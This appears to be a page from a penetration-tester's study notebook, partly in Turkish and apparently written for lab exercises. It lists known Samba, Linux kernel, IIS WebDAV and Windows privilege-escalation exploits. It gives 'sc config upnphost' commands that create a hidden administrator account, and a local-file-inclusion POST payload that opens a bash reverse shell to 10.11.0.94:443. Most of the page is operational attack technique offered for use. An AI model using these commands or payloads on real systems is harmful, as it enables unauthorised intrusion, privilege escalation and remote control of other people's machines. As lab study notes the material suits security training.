Common Exploits

Samba trans2open Overflow (Linux x86) / 10.11.1.22

This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8.

dirty cow exploit

Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)

Linux Kernel 2.6.39 < 3.2.2 - 'Mempodipper' Local Privilege Escalation

Webdav exploit

windows/iis/iis_webdav_upload_asp

linux/samba/trans2open (Samba 2.2.x) - exploitdb-link Samba < 2.2.8

samba servisine yönelik kullanılacak exploit

Exploit Title: Windows x86 (all versions) AFD privilege escalation (MS11-046) win7/winserver2008 ve öncesi oslarda çalışıyor. - afd.sys Privilege Escalation (MS14-040), PoC

accesschk.exe

# sc config upnphost binpath= "net eviluser testxlab Password1 /add"
# sc config upnphost binpath= "net localgroup Administrators eviluser /add"
# sc stop upnphost
# sc start upnphost

Servisin Config Ayarlarını Görmek için

# sc qc upnphost

Servislerin izin kontrolleri

# accesschk-xp.exe  -uwcqv "Authenticated Users" * /accepteula

kullanımı yazılacak

Notlar

Windows xp, xp sp1, sp2 gibi sistemlerde upnphost servisi üzerinden hak ve yetki yükseltebilirsin.

LFI to RCE

POST /section.php?page=php://input%00

[HTTP POST DATA] 
<?php echo shell_exec("bash -i >& /dev/tcp/10.11.0.94/443 0>&1 2>&1"); ?>

ms11-080

##

PreviousTunneling and ForwardingNextWindows Servisler

Last updated